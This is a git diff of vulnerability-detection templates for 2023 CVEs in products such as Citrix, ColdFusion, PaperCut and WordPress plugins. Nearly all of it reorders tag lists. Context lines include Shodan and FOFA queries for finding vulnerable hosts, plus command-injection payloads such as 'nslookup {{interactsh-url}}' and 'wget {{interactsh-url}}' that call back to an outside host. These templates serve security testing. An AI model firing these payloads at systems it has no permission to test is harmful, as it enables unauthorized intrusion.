diff --git a/http/cves/2023/CVE-2023-23491.yaml b/http/cves/2023/CVE-2023-23491.yaml
index c98ef0e30b..0640bbeefa 100644
--- a/http/cves/2023/CVE-2023-23491.yaml
+++ b/http/cves/2023/CVE-2023-23491.yaml
@@ -25,7 +25,7 @@ info:
product: quick_event_manager
framework: wordpress
publicwww-query: "/wp-content/plugins/quick-event-manager"
- tags: cve,cve2023,wordpress,wp,wp-plugin,wpscan,xss,quick-event-manager,fullworksplugins
+ tags: cve2023,cve,wordpress,wp,wp-plugin,wpscan,xss,quick-event-manager,fullworksplugins
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-23492.yaml b/http/cves/2023/CVE-2023-23492.yaml
index df02391efc..3b0f5b75f6 100644
--- a/http/cves/2023/CVE-2023-23492.yaml
+++ b/http/cves/2023/CVE-2023-23492.yaml
@@ -28,7 +28,7 @@ info:
vendor: idehweb
product: login_with_phone_number
framework: wordpress
- tags: login-with-phonenumber,wordpress,wp,wp-plugin,xss,tenable,cve,cve2023,idehweb
+ tags: cve2023,cve,login-with-phonenumber,wordpress,wp,wp-plugin,xss,tenable,idehweb
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-2356.yaml b/http/cves/2023/CVE-2023-2356.yaml
index 1764f47de5..355ec94bfe 100644
--- a/http/cves/2023/CVE-2023-2356.yaml
+++ b/http/cves/2023/CVE-2023-2356.yaml
@@ -29,7 +29,7 @@ info:
product: mlflow
shodan-query: http.title:"mlflow"
fofa-query: app="MLflow"
- tags: cve,cve2023,lfi,huntr,mlflow,oss,intrusive,lfprojects
+ tags: cve2023,cve,lfi,huntr,mlflow,oss,intrusive,lfprojects
variables:
str: "{{rand_base(6)}}"
diff --git a/http/cves/2023/CVE-2023-23752.yaml b/http/cves/2023/CVE-2023-23752.yaml
index c0f9b58bf6..8cffb10115 100644
--- a/http/cves/2023/CVE-2023-23752.yaml
+++ b/http/cves/2023/CVE-2023-23752.yaml
@@ -27,7 +27,7 @@ info:
vendor: joomla
product: joomla\!
shodan-query: html:"Joomla! - Open Source Content Management"
- tags: cve,cve2023,joomla
+ tags: cve2023,cve,joomla
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-24044.yaml b/http/cves/2023/CVE-2023-24044.yaml
index 48582ade11..f825d7f296 100644
--- a/http/cves/2023/CVE-2023-24044.yaml
+++ b/http/cves/2023/CVE-2023-24044.yaml
@@ -31,7 +31,7 @@ info:
product: obsidian
shodan-query: title:"Plesk Obsidian"
fofa-query: title="Plesk Obsidian"
- tags: cve,cve2023,header,injection,plesk,obsidian
+ tags: cve2023,cve,header,injection,plesk,obsidian
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-24278.yaml b/http/cves/2023/CVE-2023-24278.yaml
index a3a2ed6100..8fc1bc4463 100644
--- a/http/cves/2023/CVE-2023-24278.yaml
+++ b/http/cves/2023/CVE-2023-24278.yaml
@@ -28,7 +28,7 @@ info:
vendor: squidex.io
product: squidex
shodan-query: http.favicon.hash:1099097618
- tags: cve,cve2023,xss,squidex,cms,unauth,squidex.io
+ tags: cve2023,cve,xss,squidex,cms,unauth,squidex.io
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-24322.yaml b/http/cves/2023/CVE-2023-24322.yaml
index aa329437f2..6662d8542d 100644
--- a/http/cves/2023/CVE-2023-24322.yaml
+++ b/http/cves/2023/CVE-2023-24322.yaml
@@ -27,7 +27,7 @@ info:
vendor: mojoportal
product: mojoportal
shodan-query: html:"mojoPortal"
- tags: cves,cve2023,mojoportal,xss
+ tags: cve,cve2023,cves,mojoportal,xss
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-24488.yaml b/http/cves/2023/CVE-2023-24488.yaml
index 8c84e14da7..b167fc1eda 100644
--- a/http/cves/2023/CVE-2023-24488.yaml
+++ b/http/cves/2023/CVE-2023-24488.yaml
@@ -29,7 +29,7 @@ info:
vendor: citrix
product: gateway
shodan-query: title:"Citrix Gateway"
- tags: cve,cve2023,citrix,xss,adc
+ tags: cve2023,cve,citrix,xss,adc
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-24489.yaml b/http/cves/2023/CVE-2023-24489.yaml
index b8f3fd768a..1ea31d4089 100644
--- a/http/cves/2023/CVE-2023-24489.yaml
+++ b/http/cves/2023/CVE-2023-24489.yaml
@@ -28,7 +28,7 @@ info:
vendor: citrix
product: sharefile_storage_zones_controller
shodan-query: title:"ShareFile Storage Server"
- tags: cve,cve2023,sharefile,rce,intrusive,fileupload,fuzz,kev,citrix
+ tags: cve2023,cve,sharefile,rce,intrusive,fileupload,fuzz,kev,citrix
variables:
fileName: '{{rand_base(8)}}'
diff --git a/http/cves/2023/CVE-2023-24657.yaml b/http/cves/2023/CVE-2023-24657.yaml
index e41072b1b4..2e41e89b1c 100644
--- a/http/cves/2023/CVE-2023-24657.yaml
+++ b/http/cves/2023/CVE-2023-24657.yaml
@@ -27,7 +27,7 @@ info:
vendor: phpipam
product: phpipam
shodan-query: html:"phpIPAM IP address management"
- tags: cve,cve2023,xss,phpipam,authenticated
+ tags: cve2023,cve,xss,phpipam,authenticated
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-24735.yaml b/http/cves/2023/CVE-2023-24735.yaml
index 63f5bf60af..bc0725acce 100644
--- a/http/cves/2023/CVE-2023-24735.yaml
+++ b/http/cves/2023/CVE-2023-24735.yaml
@@ -28,7 +28,7 @@ info:
vendor: pmb_project
product: pmb
shodan-query: http.favicon.hash:1469328760
- tags: cve,cve2023,redirect,pmb,pmb_project
+ tags: cve2023,cve,redirect,pmb,pmb_project
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-24737.yaml b/http/cves/2023/CVE-2023-24737.yaml
index 2bd95581a3..a0a81244be 100644
--- a/http/cves/2023/CVE-2023-24737.yaml
+++ b/http/cves/2023/CVE-2023-24737.yaml
@@ -28,7 +28,7 @@ info:
vendor: pmb_project
product: pmb
shodan-query: http.favicon.hash:1469328760
- tags: cve,cve2023,xss,pmb,pmb_project
+ tags: cve2023,cve,xss,pmb,pmb_project
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-2479.yaml b/http/cves/2023/CVE-2023-2479.yaml
index 9fd2019595..5d0eaf8051 100644
--- a/http/cves/2023/CVE-2023-2479.yaml
+++ b/http/cves/2023/CVE-2023-2479.yaml
@@ -23,7 +23,7 @@ info:
max-request: 1
vendor: appium
product: appium-desktop
- tags: huntr,cve,cve2023,appium,oast,rce
+ tags: cve2023,cve,huntr,appium,oast,rce
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml
index 4257e61a4c..175f7fe490 100644
--- a/http/cves/2023/CVE-2023-25135.yaml
+++ b/http/cves/2023/CVE-2023-25135.yaml
@@ -29,7 +29,7 @@ info:
product: vbulletin
shodan-query: http.component:"vBulletin"
google-query: intext:"Powered By vBulletin"
- tags: cve,cve2023,vbulletin,rce,kev
+ tags: cve2023,cve,vbulletin,rce,kev
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-25157.yaml b/http/cves/2023/CVE-2023-25157.yaml
index de3402e0ef..296bbee47c 100644
--- a/http/cves/2023/CVE-2023-25157.yaml
+++ b/http/cves/2023/CVE-2023-25157.yaml
@@ -30,7 +30,7 @@ info:
vendor: osgeo
product: geoserver
shodan-query: title:"geoserver"
- tags: cve,cve2023,geoserver,ogc,sqli,intrusive,osgeo
+ tags: cve2023,cve,geoserver,ogc,sqli,intrusive,osgeo
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-25346.yaml b/http/cves/2023/CVE-2023-25346.yaml
index 48bf4834ca..bcafcade1d 100644
--- a/http/cves/2023/CVE-2023-25346.yaml
+++ b/http/cves/2023/CVE-2023-25346.yaml
@@ -27,7 +27,7 @@ info:
max-request: 2
vendor: churchcrm
product: churchcrm
- tags: cve,cve2023,churchcrm,xss,authenticated
+ tags: cve2023,cve,churchcrm,xss,authenticated
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-25717.yaml b/http/cves/2023/CVE-2023-25717.yaml
index 8aa940f414..d76eb31acc 100644
--- a/http/cves/2023/CVE-2023-25717.yaml
+++ b/http/cves/2023/CVE-2023-25717.yaml
@@ -29,7 +29,7 @@ info:
product: ruckus_wireless_admin
shodan-query: title:"ruckus wireless"
fofa-query: title="ruckus wireless"
- tags: cve,cve2023,ruckus,rce,kev,ruckuswireless
+ tags: cve2023,cve,ruckus,rce,kev,ruckuswireless
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-26067.yaml b/http/cves/2023/CVE-2023-26067.yaml
index eace4b6bcc..9a1a738b38 100644
--- a/http/cves/2023/CVE-2023-26067.yaml
+++ b/http/cves/2023/CVE-2023-26067.yaml
@@ -30,7 +30,7 @@ info:
vendor: lexmark
product: cxtpc_firmware
shodan-query: "Server: Lexmark_Web_Server"
- tags: cve,cve2023,printer,iot,lexmark
+ tags: cve2023,cve,printer,iot,lexmark
variables:
cmd: 'nslookup {{interactsh-url}}'
diff --git a/http/cves/2023/CVE-2023-26255.yaml b/http/cves/2023/CVE-2023-26255.yaml
index d96563d514..a44ab810e1 100644
--- a/http/cves/2023/CVE-2023-26255.yaml
+++ b/http/cves/2023/CVE-2023-26255.yaml
@@ -28,7 +28,7 @@ info:
product: stagil_navigation
framework: jira
shodan-query: title:Jira
- tags: cve,cve2023,lfi,jira,cms,atlassian,stagil
+ tags: cve2023,cve,lfi,jira,cms,atlassian,stagil
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-26347.yaml b/http/cves/2023/CVE-2023-26347.yaml
index eb7aff1fca..8a7802fd7d 100644
--- a/http/cves/2023/CVE-2023-26347.yaml
+++ b/http/cves/2023/CVE-2023-26347.yaml
@@ -26,7 +26,7 @@ info:
product: coldfusion
shodan-query: http.component:"Adobe ColdFusion"
fofa-query: app="Adobe-ColdFusion"
- tags: cve,cve2023,adobe,coldfusion,auth-bypass
+ tags: cve2023,cve,adobe,coldfusion,auth-bypass
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-26360.yaml b/http/cves/2023/CVE-2023-26360.yaml
index 1ef6ebe5d0..6e67ed3b45 100644
--- a/http/cves/2023/CVE-2023-26360.yaml
+++ b/http/cves/2023/CVE-2023-26360.yaml
@@ -29,7 +29,7 @@ info:
vendor: "adobe"
product: coldfusion
shodan-query: http.component:"Adobe ColdFusion"
- tags: packetstorm,cve,cve2023,adobe,coldfusion,lfi,kev
+ tags: cve2023,cve,packetstorm,adobe,coldfusion,lfi,kev
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-26469.yaml b/http/cves/2023/CVE-2023-26469.yaml
index eef6ebd3c1..ed0c20a023 100644
--- a/http/cves/2023/CVE-2023-26469.yaml
+++ b/http/cves/2023/CVE-2023-26469.yaml
@@ -30,7 +30,7 @@ info:
vendor: jorani
product: jorani
shodan-query: http.favicon.hash:-2032163853
- tags: cve,cve2023,jorani,rce,packetstorm
+ tags: cve2023,cve,jorani,rce,packetstorm
variables:
cmd: "id"
payload: ""
diff --git a/http/cves/2023/CVE-2023-2648.yaml b/http/cves/2023/CVE-2023-2648.yaml
index 26b011502b..7c1b6ce657 100644
--- a/http/cves/2023/CVE-2023-2648.yaml
+++ b/http/cves/2023/CVE-2023-2648.yaml
@@ -29,7 +29,7 @@ info:
vendor: weaver
product: e-office
fofa-query: app="泛微-EOffice"
- tags: cve,cve2023,weaver,eoffice,ecology,fileupload,rce,intrusive
+ tags: cve2023,cve,weaver,eoffice,ecology,fileupload,rce,intrusive
variables:
file: '{{rand_base(5, "abc")}}'
diff --git a/http/cves/2023/CVE-2023-26842.yaml b/http/cves/2023/CVE-2023-26842.yaml
index fb4a68e1f9..30dad11a81 100644
--- a/http/cves/2023/CVE-2023-26842.yaml
+++ b/http/cves/2023/CVE-2023-26842.yaml
@@ -26,7 +26,7 @@ info:
max-request: 2
vendor: churchcrm
product: churchcrm
- tags: cve,cve2023,churchcrm,stored-xss,xss,authenticated
+ tags: cve2023,cve,churchcrm,stored-xss,xss,authenticated
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-26843.yaml b/http/cves/2023/CVE-2023-26843.yaml
index e02b7e4b53..588a6dca73 100644
--- a/http/cves/2023/CVE-2023-26843.yaml
+++ b/http/cves/2023/CVE-2023-26843.yaml
@@ -27,7 +27,7 @@ info:
max-request: 2
vendor: churchcrm
product: churchcrm
- tags: cve,cve2023,churchcrm,stored-xss,xss,authenticated
+ tags: cve2023,cve,churchcrm,stored-xss,xss,authenticated
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-27034.yaml b/http/cves/2023/CVE-2023-27034.yaml
index 58bee7b5cd..aef05ec483 100644
--- a/http/cves/2023/CVE-2023-27034.yaml
+++ b/http/cves/2023/CVE-2023-27034.yaml
@@ -28,7 +28,7 @@ info:
vendor: joommasters
product: jms_blog
framework: prestashop
- tags: cve,cve2023,prestashop,prestashop-module,sqli,intrusive,joommasters
+ tags: cve2023,cve,prestashop,prestashop-module,sqli,intrusive,joommasters
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-27159.yaml b/http/cves/2023/CVE-2023-27159.yaml
index 495a9f6b56..ab48bf7c74 100644
--- a/http/cves/2023/CVE-2023-27159.yaml
+++ b/http/cves/2023/CVE-2023-27159.yaml
@@ -30,7 +30,7 @@ info:
vendor: appwrite
product: appwrite
shodan-query: title:"Sign In - Appwrite"
- tags: cve,cve2023,appwrite,ssrf,oast
+ tags: cve2023,cve,appwrite,ssrf,oast
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-27179.yaml b/http/cves/2023/CVE-2023-27179.yaml
index 1cac952fe4..9be675e184 100644
--- a/http/cves/2023/CVE-2023-27179.yaml
+++ b/http/cves/2023/CVE-2023-27179.yaml
@@ -29,7 +29,7 @@ info:
max-request: 1
vendor: gdidees
product: gdidees_cms
- tags: packetstorm,cve,cve2023,file-download,gdidees,lfr
+ tags: cve2023,cve,packetstorm,file-download,gdidees,lfr
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-27292.yaml b/http/cves/2023/CVE-2023-27292.yaml
index fb91d05ea2..d5cd0fd3da 100644
--- a/http/cves/2023/CVE-2023-27292.yaml
+++ b/http/cves/2023/CVE-2023-27292.yaml
@@ -27,7 +27,7 @@ info:
vendor: opencats
product: opencats
shodan-query: title:"opencats"
- tags: authenticated,tenable,cve,cve2023,opencats,redirect
+ tags: cve2023,cve,authenticated,tenable,opencats,redirect
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-2732.yaml b/http/cves/2023/CVE-2023-2732.yaml
index 371c6d0a1b..d5453afd90 100644
--- a/http/cves/2023/CVE-2023-2732.yaml
+++ b/http/cves/2023/CVE-2023-2732.yaml
@@ -30,7 +30,7 @@ info:
vendor: inspireui
product: mstore_api
framework: wordpress
- tags: cve,cve2023,wordpress,wp,wp-plugin,auth-bypass,mstore-api,inspireui
+ tags: cve2023,cve,wordpress,wp,wp-plugin,auth-bypass,mstore-api,inspireui
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-27350.yaml b/http/cves/2023/CVE-2023-27350.yaml
index e6f76df290..3da3e0b787 100644
--- a/http/cves/2023/CVE-2023-27350.yaml
+++ b/http/cves/2023/CVE-2023-27350.yaml
@@ -30,7 +30,7 @@ info:
vendor: papercut
product: papercut_mf
shodan-query: http.html:"PaperCut"
- tags: packetstorm,cve,cve2023,papercut,rce,oast,unauth,kev
+ tags: cve2023,cve,packetstorm,papercut,rce,oast,unauth,kev
variables:
cmd: "nslookup {{interactsh-url}}"
diff --git a/http/cves/2023/CVE-2023-27372.yaml b/http/cves/2023/CVE-2023-27372.yaml
index 525fe32cf9..4bfe0b0083 100644
--- a/http/cves/2023/CVE-2023-27372.yaml
+++ b/http/cves/2023/CVE-2023-27372.yaml
@@ -29,7 +29,7 @@ info:
vendor: spip
product: spip
shodan-query: html:"spip.php?page=backend"
- tags: packetstorm,cve,cve2023,spip,rce
+ tags: cve,cve2023,packetstorm,spip,rce
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-27482.yaml b/http/cves/2023/CVE-2023-27482.yaml
index e2e13a79a9..705e9a72cf 100644
--- a/http/cves/2023/CVE-2023-27482.yaml
+++ b/http/cves/2023/CVE-2023-27482.yaml
@@ -31,7 +31,7 @@ info:
vendor: home-assistant
product: home-assistant
shodan-query: title:"Home Assistant"
- tags: cve,cve2023,homeassistant,auth-bypass,rce,home-assistant
+ tags: cve2023,cve,homeassistant,auth-bypass,rce,home-assistant
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-27524.yaml b/http/cves/2023/CVE-2023-27524.yaml
index 664b22a8ba..2088e7d488 100644
--- a/http/cves/2023/CVE-2023-27524.yaml
+++ b/http/cves/2023/CVE-2023-27524.yaml
@@ -29,7 +29,7 @@ info:
vendor: apache
product: superset
shodan-query: html:"Apache Superset"
- tags: packetstorm,cve,cve2023,apache,superset,auth-bypass
+ tags: cve2023,cve,packetstorm,apache,superset,auth-bypass
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-27587.yaml b/http/cves/2023/CVE-2023-27587.yaml
index 1f689d32f6..9b7fb6efc0 100644
--- a/http/cves/2023/CVE-2023-27587.yaml
+++ b/http/cves/2023/CVE-2023-27587.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: readtomyshoe_project
product: readtomyshoe
- tags: cve,cve2023,debug,readtomyshoe,disclosure,readtomyshoe_project
+ tags: cve2023,cve,debug,readtomyshoe,disclosure,readtomyshoe_project
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-2780.yaml b/http/cves/2023/CVE-2023-2780.yaml
index c11a1248f2..1e755be7ee 100644
--- a/http/cves/2023/CVE-2023-2780.yaml
+++ b/http/cves/2023/CVE-2023-2780.yaml
@@ -28,7 +28,7 @@ info:
vendor: lfprojects
product: mlflow
shodan-query: http.title:"mlflow"
- tags: mlflow,oss,lfi,huntr,cve,cve2023,intrusive,lfprojects
+ tags: cve2023,cve,mlflow,oss,lfi,huntr,intrusive,lfprojects
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-27922.yaml b/http/cves/2023/CVE-2023-27922.yaml
index 8ccab41cd5..034e3054c5 100644
--- a/http/cves/2023/CVE-2023-27922.yaml
+++ b/http/cves/2023/CVE-2023-27922.yaml
@@ -26,7 +26,7 @@ info:
product: newsletter
framework: wordpress
publicwww-query: /wp-content/plugins/newsletter/
- tags: wpscan,cve,cve2023,wordpress,wp,wp-plugin,xss,newsletter,authenticated,thenewsletterplugin
+ tags: cve2023,cve,wpscan,wordpress,wp,wp-plugin,xss,newsletter,authenticated,thenewsletterplugin
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-2796.yaml b/http/cves/2023/CVE-2023-2796.yaml
index dbd2865cf5..535eca75a8 100644
--- a/http/cves/2023/CVE-2023-2796.yaml
+++ b/http/cves/2023/CVE-2023-2796.yaml
@@ -31,7 +31,7 @@ info:
shodan-query: 'vuln:CVE-2023-2796'
fofa-query: "wp-content/plugins/eventon/"
google-query: inurl:"/wp-content/plugins/eventon/"
- tags: wpscan,packetstorm,cve,cve2023,wordpress,wp-plugin,wp,eventon,bypass,myeventon
+ tags: cve2023,cve,wpscan,packetstorm,wordpress,wp-plugin,wp,eventon,bypass,myeventon
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-28121.yaml b/http/cves/2023/CVE-2023-28121.yaml
index 6b9c9dd5fd..a94ca57ede 100644
--- a/http/cves/2023/CVE-2023-28121.yaml
+++ b/http/cves/2023/CVE-2023-28121.yaml
@@ -32,7 +32,7 @@ info:
framework: wordpress
publicwww-query: /wp-content/plugins/woocommerce-payments
google-query: inurl:/wp-content/plugins/woocommerce-payments
- tags: cve,cve2023,wordpress,wp,wp-plugin,auth-bypass,intrusive,automattic
+ tags: cve2023,cve,wordpress,wp,wp-plugin,auth-bypass,intrusive,automattic
variables:
username: "{{rand_base(6)}}"
password: "{{rand_base(8)}}"
diff --git a/http/cves/2023/CVE-2023-2813.yaml b/http/cves/2023/CVE-2023-2813.yaml
index dfe67b8556..11ec332836 100644
--- a/http/cves/2023/CVE-2023-2813.yaml
+++ b/http/cves/2023/CVE-2023-2813.yaml
@@ -25,7 +25,7 @@ info:
vendor: ajaydsouza
product: connections_reloaded
framework: wordpress
- tags: wpscan,cve,cve2023,wordpress,wp-theme,xss,ajaydsouza
+ tags: cve2023,cve,wpscan,wordpress,wp-theme,xss,ajaydsouza
variables:
str: "{{rand_base(6)}}"
diff --git a/http/cves/2023/CVE-2023-2822.yaml b/http/cves/2023/CVE-2023-2822.yaml
index ac815747ce..d747637623 100644
--- a/http/cves/2023/CVE-2023-2822.yaml
+++ b/http/cves/2023/CVE-2023-2822.yaml
@@ -28,7 +28,7 @@ info:
product: ethos_identity
shodan-query: html:"Ellucian Company"
google-query: "login with ellucian ethos identity"
- tags: cve,cve2023,cas,xss,ellucian
+ tags: cve2023,cve,cas,xss,ellucian
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-2825.yaml b/http/cves/2023/CVE-2023-2825.yaml
index f777e31a04..ffabaee458 100644
--- a/http/cves/2023/CVE-2023-2825.yaml
+++ b/http/cves/2023/CVE-2023-2825.yaml
@@ -28,7 +28,7 @@ info:
vendor: gitlab
product: gitlab
shodan-query: title:"Gitlab"
- tags: cve,cve2023,gitlab,lfi,kev,authenticated,intrusive
+ tags: cve2023,cve,gitlab,lfi,kev,authenticated,intrusive
variables:
data: "{{rand_base(5)}}"
diff --git a/http/cves/2023/CVE-2023-28665.yaml b/http/cves/2023/CVE-2023-28665.yaml
index 44fcd4d80b..0f94d5b6f2 100644
--- a/http/cves/2023/CVE-2023-28665.yaml
+++ b/http/cves/2023/CVE-2023-28665.yaml
@@ -26,7 +26,7 @@ info:
vendor: technocrackers
product: bulk_price_update_for_woocommerce
framework: wordpress
- tags: cve,cve2023,wordpress,wp,wp-plugin,wpscan,xss,authenticated,woo-bulk-price-update,technocrackers
+ tags: cve2023,cve,wordpress,wp,wp-plugin,wpscan,xss,authenticated,woo-bulk-price-update,technocrackers
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-29084.yaml b/http/cves/2023/CVE-2023-29084.yaml
index 0230aa6c14..33780330be 100644
--- a/http/cves/2023/CVE-2023-29084.yaml
+++ b/http/cves/2023/CVE-2023-29084.yaml
@@ -28,7 +28,7 @@ info:
max-request: 3
vendor: zohocorp
product: manageengine_admanager_plus
- tags: packetstorm,cve,cve2023,manageengine,admanager,rce,oast,authenticated,zohocorp
+ tags: cve,cve2023,packetstorm,manageengine,admanager,rce,oast,authenticated,zohocorp
variables:
cmd: "nslookup.exe {{interactsh-url}} 1.1.1.1"
diff --git a/http/cves/2023/CVE-2023-29298.yaml b/http/cves/2023/CVE-2023-29298.yaml
index 05e442f079..e81f363c26 100644
--- a/http/cves/2023/CVE-2023-29298.yaml
+++ b/http/cves/2023/CVE-2023-29298.yaml
@@ -27,7 +27,7 @@ info:
product: coldfusion
shodan-query: http.component:"Adobe ColdFusion"
fofa-query: app="Adobe-ColdFusion"
- tags: cve,cve2023,adobe,auth-bypass,coldfusion,kev
+ tags: cve2023,cve,adobe,auth-bypass,coldfusion,kev
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-29357.yaml b/http/cves/2023/CVE-2023-29357.yaml
index 642524ab39..04c33600ef 100644
--- a/http/cves/2023/CVE-2023-29357.yaml
+++ b/http/cves/2023/CVE-2023-29357.yaml
@@ -26,7 +26,7 @@ info:
product: sharepoint_server
shodan-query: http.headers_hash:-1968878704
fofa-query: app="Microsoft-SharePoint"
- tags: cve,cve2023,microsoft,sharepoint_server
+ tags: cve2023,cve,microsoft,sharepoint_server
variables:
client_id: "00000003-0000-0ff1-ce00-000000000000"
diff --git a/http/cves/2023/CVE-2023-29622.yaml b/http/cves/2023/CVE-2023-29622.yaml
index 2dc688f492..e89871ace4 100644
--- a/http/cves/2023/CVE-2023-29622.yaml
+++ b/http/cves/2023/CVE-2023-29622.yaml
@@ -28,7 +28,7 @@ info:
max-request: 1
vendor: purchase_order_management_project
product: purchase_order_management
- tags: cve,cve2023,sqli,purchase-order,poms,purchase_order_management_project
+ tags: cve2023,cve,sqli,purchase-order,poms,purchase_order_management_project
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-29623.yaml b/http/cves/2023/CVE-2023-29623.yaml
index f016b66f39..279a371665 100644
--- a/http/cves/2023/CVE-2023-29623.yaml
+++ b/http/cves/2023/CVE-2023-29623.yaml
@@ -28,7 +28,7 @@ info:
max-request: 1
vendor: purchase_order_management_project
product: purchase_order_management
- tags: cve,cve2023,xss,purchase-order-management-system,purchase_order_management_project
+ tags: cve2023,cve,xss,purchase-order-management-system,purchase_order_management_project
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-29887.yaml b/http/cves/2023/CVE-2023-29887.yaml
index ef9659afd7..1641b7bcc7 100644
--- a/http/cves/2023/CVE-2023-29887.yaml
+++ b/http/cves/2023/CVE-2023-29887.yaml
@@ -27,7 +27,7 @@ info:
max-request: 2
vendor: nuovo
product: spreadsheet-reader
- tags: cve,cve2023,nuovo,spreadsheet-reader,lfi
+ tags: cve2023,cve,nuovo,spreadsheet-reader,lfi
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-29923.yaml b/http/cves/2023/CVE-2023-29923.yaml
index b0f63da447..10eea64d71 100644
--- a/http/cves/2023/CVE-2023-29923.yaml
+++ b/http/cves/2023/CVE-2023-29923.yaml
@@ -27,7 +27,7 @@ info:
vendor: powerjob
product: powerjob
fofa-query: app="PowerJob"
- tags: cve,cve2023,powerjob,unauth
+ tags: cve2023,cve,powerjob,unauth
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-30013.yaml b/http/cves/2023/CVE-2023-30013.yaml
index 6d4763125c..d978fe54eb 100644
--- a/http/cves/2023/CVE-2023-30013.yaml
+++ b/http/cves/2023/CVE-2023-30013.yaml
@@ -22,7 +22,7 @@ info:
max-request: 2
vendor: totolink
product: x5000r_firmware
- tags: packetstorm,cve,cve2023,totolink,unauth,rce,intrusive
+ tags: cve2023,cve,packetstorm,totolink,unauth,rce,intrusive
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-30150.yaml b/http/cves/2023/CVE-2023-30150.yaml
index 1c3efab831..12d9097269 100644
--- a/http/cves/2023/CVE-2023-30150.yaml
+++ b/http/cves/2023/CVE-2023-30150.yaml
@@ -30,7 +30,7 @@ info:
product: leocustomajax
framework: prestashop
shodan-query: http.component:"Prestashop"
- tags: cve,cve2023,prestashop,sqli,leotheme
+ tags: cve2023,cve,prestashop,sqli,leotheme
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-30210.yaml b/http/cves/2023/CVE-2023-30210.yaml
index a1ccdac2f2..25f99c5b2d 100644
--- a/http/cves/2023/CVE-2023-30210.yaml
+++ b/http/cves/2023/CVE-2023-30210.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: ourphp
product: ourphp
- tags: cve,cve2023,xss,ourphp,unauthenticated
+ tags: cve2023,cve,xss,ourphp,unauthenticated
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-30212.yaml b/http/cves/2023/CVE-2023-30212.yaml
index e604e1a839..0a15e378a7 100644
--- a/http/cves/2023/CVE-2023-30212.yaml
+++ b/http/cves/2023/CVE-2023-30212.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: ourphp
product: ourphp
- tags: cve,cve2023,xss,ourphp
+ tags: cve2023,cve,xss,ourphp
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-30256.yaml b/http/cves/2023/CVE-2023-30256.yaml
index 90da2790d6..b7ecde2f16 100644
--- a/http/cves/2023/CVE-2023-30256.yaml
+++ b/http/cves/2023/CVE-2023-30256.yaml
@@ -29,7 +29,7 @@ info:
max-request: 1
vendor: webkul
product: qloapps
- tags: packetstorm,cve,cve2023,xss,webkul-qloapps,unauth,webkul
+ tags: cve2023,cve,packetstorm,xss,webkul-qloapps,unauth,webkul
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-30258.yaml b/http/cves/2023/CVE-2023-30258.yaml
index 908cb51cfe..b224e7cbab 100644
--- a/http/cves/2023/CVE-2023-30258.yaml
+++ b/http/cves/2023/CVE-2023-30258.yaml
@@ -27,7 +27,7 @@ info:
vendor: magnussolution
product: magnusbilling
shodan-query: http.html:"magnusbilling"
- tags: packetstorm,cve,cve2023,magnusbilling,rce,oast,unauth,intrusive,magnussolution
+ tags: cve,cve2023,packetstorm,magnusbilling,rce,oast,unauth,intrusive,magnussolution
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-30534.yaml b/http/cves/2023/CVE-2023-30534.yaml
index 7401793560..983fd228bd 100644
--- a/http/cves/2023/CVE-2023-30534.yaml
+++ b/http/cves/2023/CVE-2023-30534.yaml
@@ -22,7 +22,7 @@ info:
metadata:
shodan-query: title:"Cacti"
verified: "true"
- tags: cve,cve2023,cacti,authenticated
+ tags: cve2023,cve,cacti,authenticated
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-30625.yaml b/http/cves/2023/CVE-2023-30625.yaml
index 59df8e081c..3390ca4d29 100644
--- a/http/cves/2023/CVE-2023-30625.yaml
+++ b/http/cves/2023/CVE-2023-30625.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: rudderstack
product: rudder-server
- tags: packetstorm,cve,cve2023,rudder,rudderstack
+ tags: cve,cve2023,packetstorm,rudder,rudderstack,sqli
variables:
cmd: "wget {{interactsh-url}}"
diff --git a/http/cves/2023/CVE-2023-30777.yaml b/http/cves/2023/CVE-2023-30777.yaml
index 4f2853ca57..7edb2d98c7 100644
--- a/http/cves/2023/CVE-2023-30777.yaml
